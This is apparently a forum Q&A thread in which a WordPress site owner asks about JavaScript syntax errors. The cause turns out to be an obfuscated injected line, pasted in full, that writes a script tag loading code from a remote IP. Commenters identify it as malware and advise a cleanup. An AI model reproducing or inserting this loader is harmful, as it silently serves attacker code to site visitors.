# SyntaxError: missing ; before statement error in wordpress

Tags: javascript, php, wordpress

All working fine in localhost, but in live server, all of a sudden I get the above mentioned error for every single js file.

I commented out `wp_enqueue_scripts` in `functions.php`, to see if the error disappears but it still there.

Also added below line thinking the string concatnation might have caused it.

```
//prevent javascript concat
define('CONCATENATE_SCRIPTS', false);
```

I can't find out what might cause this problem. Please advise me. I can provide my site's access to test.

EDIT:

I opened one of my plugin file shown in the console with error remark. Noticed weird string before the actual code begin. I suspect this could be the problem.

Is this some kind of prefix by wordpress or unwanted string from elsewhere?

```
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))jQuery(document).ready(function() {

    var meta_image_frame;
    var meta_mobileimage_frame;

        // Runs when the image button is clicked.
        jQuery('#banner_manager_image_button').click(function(e){

        ....plugins js code-----
        });


});
```

Comment: Check if your files have moved to server correctly. Maybe you have some additional chars somewhere? Like `\r\n` replaced to `\r` and than all comments become ruined

Comment: You may want to look at your javascript files to see where the issue may be. If there's a line number from the error, even better.

Comment: @aynber, I just checked one of the js files from console. I added my findings i my post above. see if you could advise

Comment: @Justinas, refering to my edited post, where could this additional chars come from?

Comment: Your site is infected. I can't even view this post on my computer because my antivirus freaks out. You'll need to clean up your WordPress site.

Comment: possible file encoding change while uploading or editing by file manager.

Comment: @ShravanShrama, could you please explain  further. I first had the problem while uplaoding image to woocomerce product.

Comment: @aynber, I didn't provide any link yet to my site. May I know how this post affect your system?

Comment: Your JavaScript code that you posted here contains an infection/malicious downloader: JS:Agent-DZP [Trj] is what Avast is telling me. It's probably those characters at the beginning

Comment: @aynber, I see. Is that mean I need to re-install the wordpress? All my work will be gone? Is there no other way around?

Comment: You can try searching for the malicious code and remove it, but sometimes it's better to nuke it from orbit. And upgrade your WP installation when you're done.

Comment: @aynber, if my wordpress is of latest version, can I still upgrade?

Comment: Not if it's the newest version, but make sure you stay up-to-date, and the same for your plugins. That code came from somewhere, so something is compromised. It will be hard to tell from where.

Answer (score 1):

Your `_0xaae8` is missing `;` before `jQuery(document).ready(`.

---

This code : `var _0xaae8=[...` looks like injected code. Usually I had seen such codes injected via some bad written tools/plugins/libs that allow user to work with files (like uploading file to server). I suggest removing it if it's not your code and check other files on server too.

Comment: I don't know where the additional string injected thus I'm not able to remove it. Also I did try deactivating all plugins to see if the issue resolved. But it persiste.

Comment: I suspect print_head_scripts function in script-loader contains the error...checking

Comment: @112233 Disabling plugins may not help, because files are already injected.